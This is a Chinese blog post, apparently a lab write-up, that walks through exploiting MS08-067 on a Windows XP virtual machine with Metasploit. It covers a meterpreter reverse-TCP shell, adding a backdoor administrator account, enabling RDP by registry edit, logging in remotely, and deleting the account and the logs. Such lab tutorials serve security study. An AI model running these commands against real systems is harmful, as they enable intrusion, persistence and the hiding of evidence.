内网渗透笔记(二):MS08-067漏洞利用

最新推荐文章于 2024-06-20 12:00:00 发布
最新推荐文章于 2024-06-20 12:00:00 发布
阅读量1.8k 收藏 9
点赞数 1
分类专栏: 安全 文章标签: 渗透 安全 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hg666hh/article/details/89785878
版权

前言:
漏洞介绍:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。(出自百度百科)
实验环境:虚拟机
攻击者操作系统:Kali Linux 2019.1
靶机操作系统:Window Xp SP2

一、扫描

  • 使用Nnessus扫描靶机后发现存在MS08-067漏洞:

在这里插入图片描述

二、利用

  • 使用命令:msfdb init初始化msf框架:

在这里插入图片描述

  • 启动数据库:service postgresql start
  • 使用命令:msfconsole,进入metasploit:

在这里插入图片描述

  • 查找漏洞脚本:search ms08-067

在这里插入图片描述

  • 使用漏洞脚本:use exploit/windows/smb/ms08_067_netapi

在这里插入图片描述

  • 设置攻击载荷:set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

  • 查看攻击所需的配置选项:show options

在这里插入图片描述

  • 设置靶机IP:set RHOSTS 192.168.188.123
  • 设置攻击者IP:set LHOST 192.168.188.121

在这里插入图片描述

  • 查看靶机系统类型:show targets

在这里插入图片描述

  • 设置靶机系统类型:set target 10

在这里插入图片描述

  • 攻击: exploit

在这里插入图片描述

三、提权

  • shell

在这里插入图片描述

  • 创建用户:net user test 123 /add

在这里插入图片描述

  • 提权:net localgroup administrators test /add

在这里插入图片描述

  • 删除原来的用户组:net localgroup users test /del

在这里插入图片描述

  • 查看用户: net user test

在这里插入图片描述

四、入侵

  • 在运行中打开:mstsc,远程连接靶机:
    在这里插入图片描述
  • 使用刚刚创建好的用户登录:

在这里插入图片描述

  • 登录成功:

在这里插入图片描述

五、退隐

  • 删除用户

在这里插入图片描述

  • 删除日志:

在这里插入图片描述

溜了,溜了!

PS:若靶机关闭的远程服务则需在shell中执行以下命令:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

在这里插入图片描述

hg666hh
关注
专栏目录
MS17-010:MS17-010 Poc Shell 调用Nmap and Metasploit 内网445测试的一款Poc
05-18
永恒之蓝 MS17-010 Scan and Exploit Shell Usage MAC OSX git clone https://github.com/xaiJoker/MS17-010/ cd ms17-010 && chmod +x ms17-010.sh sh ms17-010.sh Linux git clone ...
ms08_067,ms10_046漏洞复现与利用
kunkun_xiaomeng的博客
09-07 1504
ms08_067,ms10_046
Kali之MSF的MS08-067漏洞复现详解
m0_59598029的博客
02-24 1056
MS08-067漏洞是2008年的一个特大漏洞,该漏洞目前早已修补。ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞,主要针对的是windowsWindowsxp下载。
渗透测试基础(四) MS08-067 漏洞攻击
最新发布
Venus_majian
06-20 678
1. 漏洞介绍 2. 环境搭建 3. 渗透测试 4. 主机利用
使用Metaspoit攻击MS08-067
weixin_30500663的博客
04-21 269
kali视频学习请看 http://www.cnblogs.com/lidong20179210/p/8909569.html 使用Metaspoit攻击MS08-067 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000Wind...
Metasploitable渗透测试实战:ms08-067
m0_60121089的博客
05-06 878
目录 1.漏洞描述 2.实战工具 3.漏洞利用 1.漏洞描述 此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本 Mi.
渗透攻击MS08-067
hmysn的博客
12-22 2055
渗透攻击MS08-067
内网渗透笔记,课堂资料
03-11
内网渗透是对内部网络进行安全测试和评估的过程,通常由安全专家执行,目的是发现并修复潜在的安全漏洞。在企业环境中,内网往往包含了敏感数据和关键业务系统,因此内网安全至关重要。这篇“内网渗透笔记,课堂资料...
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
Metasploit-Framework是一个开源项目,由 Rapid7 维护,它包含了大量的漏洞利用模块、payloads(有效载荷)以及后渗透工具。这个框架允许安全专家和道德黑客模拟攻击,测试网络防御,评估安全风险。通过Metasploit,...
内网渗透随想 作者:未知.pdf
04-08
内网渗透随想 作者:未知
信息系统安全实验(十):使用Metasploit渗透攻击MS08-067(Windows Server 2003 SP0)、Samba(Ubuntu 8.04)
agjirowjtg的博客
02-01 3447
这是信息系统安全实验系列的第十篇~ 一、实验概述 1.   实验目的        学习渗透测试(penetration)的相关知识,包括渗透测试的方法及其过程。学习Metasploit的基本知识,了解其基本的架构,并且能使用其基本的功能对靶机的已知漏洞进行利用。 2.   实验环境        Kali Linux以及其他靶机环境 3.   工具介绍        Metaspl...
Metasploit利用MS08-067漏洞
test
11-20 9308
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS08-067.ms08_...
渗透测试基础-1 针对MS08-067漏洞
zhangyixing_mj的博客
05-07 460
一、准备工作 工具环境:kali下载安装 靶场环境: 1.kali切换到root权限。有两种方式:直接切换到管理员权限,这种方式虽然比较方便,但是也比较危险,root权限很大,如果有误操作会产生较大的影响;当某些操作需要管理员权限时,临时提权,该操作结束后,恢复普通用户权限。推荐第种方 sudo su #切换到管理员权限下 sudo ifconfig #临时对ifconfig操作提权 2.将kali和靶场winXP设置到同一局域网下,将者的网络适配器均设置为 仅主机模式。 操作:选中.
一篇论文引发的入侵——记对当地医科大的渗透检测
孤水绕城的专栏
03-14 2518
记得很久没去高中群里冒泡了,估计好多同学都忘了俺了,可是没闪两句就收到一个很久没联系过的同学发来的信息,看了下原来是班里的一个PLMM发的。于是就聊了起来,聊来聊去料到了论文上,她说她现在在写医学论文,而且写的很辛苦,可是俺也没办法帮忙啊,俺又不懂医学的东东。不过俺这人见不得MM不开心所以就找一个在当地医科大上学的朋友,看看他能帮上忙不?可是他说他也不会写,不过他说他们医科大网站服务器上就有论文。
MS08-067的稳定利用方法
LittleWallE的专栏
01-14 4869
MS08-067已经出来三个月了,大部分服务器已经打上了补丁,看来利用价值不大。但是做为一个学习的材料还是挺好的。这个漏洞的原理在很多文章中都解释的非常详细了,但是关于漏洞利用的文章却比较少(可能是我没找到),我自己摸索了一整子,参考了不少高手们写的exploit,终于摸索出一个还算稳定的利用方法,将摸索的过程整理成本文。如果您发现有什么不足之处,或者有更好的方法,请联系我: Li
渗透测试-信息收集的方法
lza20001103的博客
05-09 3045
渗透测试-信息收集的方法
渗透攻击漏洞利用实验(ms08-067、samba漏洞利用,ms03-026漏洞利用并长期保持)
qq_20381661的专栏
04-10 4818
(一)对MS08_067漏洞渗透攻击 1.使用msfconsole启动Metasploit终端,进入后使用search命令,搜索该漏洞对应的模块: 2.启用这个攻击模块,查看信息,设置攻击载荷: 3.查看渗透攻击所需的配置选项: 4.根据具体情况配置渗透攻击各个选项,并查看设置后的情况: 5.使用exploit发起渗透攻击,获得shell并进行简单操作: ()利用samba漏洞 1.使用seach命令搜索samba漏洞对应的模块: 2.启用usermap_s
Metasploit学习笔记(七)——Meterpreter后渗透之传统MS08-067漏洞利用(没成功)
Zichel77的博客
10-09 442
一开始我的XP的445端口没有打开,所以还需要进行如下操作在XP系统中,点击开始-运行输入regedit打开注册表编辑器然后依次打开目录如已关闭445端口可以看到SMBDeviceEnabled这个项,类型为REG_DWORD。如没有在Parameters目录下添加一个DWORD键值——名称:SMBDeviceEnabled 类型:REG_DWORD 数值:1然后重新打开运行–cmd–输入netstat -an,可以看到已打开445端口这之后在kali中扫描发现445端口开放。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值